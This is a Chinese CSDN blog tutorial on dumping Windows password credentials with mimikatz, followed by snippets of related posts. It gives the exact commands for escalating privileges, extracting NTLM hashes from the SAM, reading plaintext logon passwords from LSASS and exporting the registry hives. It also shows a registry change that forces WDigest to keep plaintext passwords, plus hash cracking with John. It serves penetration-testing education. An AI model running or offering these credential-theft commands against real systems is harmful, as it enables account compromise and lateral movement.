使用mimikatz获取windows密码凭证

最新推荐文章于 2024-06-15 20:20:53 发布
最新推荐文章于 2024-06-15 20:20:53 发布
阅读量1.3k 收藏 3
点赞数 2
文章标签: 安全 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuteyann/article/details/130732849
版权

工具:mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz/releases

1、开启mimikatz。以管理员权限打开cmd,进入mimikatz相应操作系统的目录下,输入命令:

mimikatz.exe

 

2、提升权限,输入命令:

 privilege::debug

(如果出现以下报错:ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)

3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

 token::elevate

 3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

token::elevate

 4、获取到NTLM的hash,输入命令:

lsadump::sam

 

 

L_yann
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
使用mimikatz获取和创建Windows凭据的工具和方法
weixin_30772261的博客
05-28 897
Mimikatz 下载地址 https://github.com/gentilkiwi/mimikatz/releases 本地凭据破解 以管理员身份运行(拿到shell提权后) mimikatz#privilege::debug "测试是否OK,正确的返回应该是Privilege '20' OK" mimikatz#sekurlsa::logonpasswords "获取本机用户名、口令、S...
内网渗透-Windows RDP凭证的抓取和密码破解测试的方法
lza20001103的博客
04-15 971
内网渗透-Windows RDP凭证的抓取和密码破解测试的方法
cs与msf权限传递,以及mimikatz抓取明文密码
最新发布
M372109150的博客
06-15 1129
cs与msf权限传递,以及mimikatz抓取win10明文密码
mimikatz获取系统密码
03-28
获取系统级别密码
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6610
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
mimikatz抓取密码
G208_522的博客
10-26 4507
mimikatz抓取密码
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2144
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
解决:ERROR kuhl m_privilege simple: Rtiadjustprivilege (20) c0000061
(●'◡'●)
07-17 3191
ERROR kuhl m_privilege simple: Rtiadjustprivilege (20) c0000061 打开附件--找到命令行--右键--管理员打开 好了,芜湖~
获取Windows明文密码mimikatz2.2-x64.rar
03-19
标题 "获取Windows明文密码mimikatz2.2-x64.rar" 指向的是一个使用Mimikatz工具来提取Windows系统中明文密码的过程。Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统安全分析,特别是...
Mimikatz Windows 密码抓取神器
05-27
1. **LSA(Local Security Authority)密码获取**:LSA是Windows系统中负责认证和授权的组件。Mimikatz 可以直接从LSA的内存中读取未加密的密码数据,包括用户登录密码、域控制器的NTLM哈希以及 Kerberos TGT...
windows 密码抓捕神器mimikatz
08-15
Mimikatz,这款被称为“Windows密码抓捕神器”的工具,是由法国安全研究员Benjamin Delpy所创建的一款轻量级调试器。在IT安全领域,尤其是渗透测试和安全研究中,Mimikatz因其强大的功能而备受推崇。它能够帮助安全...
mimikatz(windows 明文密码抓取工具)
04-02
mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于在Windows操作系统中获取明文密码、 kerberos票据、LSA秘密等敏感信息。由于其功能强大且易于使用mimikatz网络安全领域广受欢迎,既用于...
mimikatz获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7042
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
在Win10系统中用mimikatz抓取明文密码
weixin_42558965的博客
03-22 4150
实验环境 :Windows10专业版 参考了网上的方法,发现大部分都是抄的 https://blog.csdn.net/netsec_steven/article/details/107257325 这一篇文章,都被转烂了,这一篇文章是对的,但是路径上还是有点小问题的,原因是原作者跳了一个步骤 这个步骤是:在注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下新建一个名为UseLogonCredential的DWORD值,并且
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1802
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码
mimikatz常见命令
G3et的博客
01-29 1458
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
windows凭据收集
fzy2003的博客
07-10 429
掌握windows凭据的收集方法。
【内网渗透】mimikatz 基本使用
君行路的博客
08-14 2094
文章目录前言1. 工具简介2. 提升权限 privilege::debug3. 抓取明文密码 sekurlsa::logonpasswords4. sekurlsa模块 获取密码信息4.1 procdump + mimikatz 加载dmp文件,并导出其中的明文密码4.2 导出lsass.exe进程中所有的票据 sekurlsa::tickets /export5. lsadump模块 读取域控中域成员Hash5.1 读取所有域用户的哈希 lsadump::lsa /patch5.2 查看域内指定用户信息,
mimikatz散列值学习
HoAd'blog
08-06 412
mimikatz散列值学习 补丁KB2871997 关闭wdigest功能 windows server2012 关闭wdigest,无法获取明文密码 两种方法开启wdigest 抓取用户的明文密码 #使用reg add ##开启 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f ##关闭 reg add HKLM\SYSTE
使用mimikatz进行windows中存储的密码查看
09-07
Windows系统中,mimikatz是一种常用的密码查看工具。其使用方法如下: 首先,下载并安装mimikatz工具。可以在GitHub上找到最新的版本。 安装完成后,打开命令提示符,并切换到mimikatz的安装路径下。 运行命令"privilege::debug"以获取调试权限。 接下来,运行命令"sekurlsa::logonpasswords",即可开始查看存储在Windows系统中的密码信息。 mimikatz会扫描系统内存,并提取出已存储的密码。其中包括本地管理员、远程桌面、Windows凭据等多种密码信息。 mimikatz还可以通过其他命令进一步查看和操作密码信息,比如"sekurlsa::pth"可以创建一个新的访问令牌,并利用已有的用户凭据进行访问。 需要注意的是,mimikatz是一个强大且复杂的工具,仅应在合法和授权的环境下使用。它可以用于安全审计、渗透测试等用途,但也容易被恶意分子用于进行攻击。因此,在没有合法授权的情况下,请不要使用该工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值